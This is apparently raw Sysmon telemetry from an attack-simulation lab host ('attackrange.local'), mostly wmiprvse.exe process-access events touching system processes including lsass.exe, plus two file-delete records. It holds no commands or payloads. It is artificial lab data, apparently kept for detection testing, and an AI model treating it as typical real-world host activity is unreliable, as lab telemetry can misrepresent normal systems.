21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150143Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150142Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150141Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150140Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150139Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150138Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150137Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150136Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150135Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150134Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150133Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150132Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150131Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150130Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150129Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150128Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150127Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150126Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150125Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150124Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150123Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150122Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150121Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150120Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150119Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.622{39BD8DE3-7094-60CA-060D-00000000D101}5472WIN-HOST-14\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveMD5=C860E498B11D431B356488047A68ADD1,SHA256=42534C3EF43B4A77830A2378396F957E3B273BF9C6CB04B7E04E1995856075AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150118Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.607{39BD8DE3-709A-60CA-080D-00000000D101}4924WIN-HOST-14\AdministratorC:\Program Files\dotnet\dotnet.exeC:\Users\Administrator\AppData\Local\Microsoft\dotnet\optimizationdata\3.1.410\win10-x64\dotnetMD5=3018C993E8408D8F85F06D27BC10AD9C,SHA256=C0097C206B2166C6EF67A392ED53C2DED82BAA0FC8312674D1137DF0A844A13F,IMPHASH=00000000000000000000000000000000falsetrue 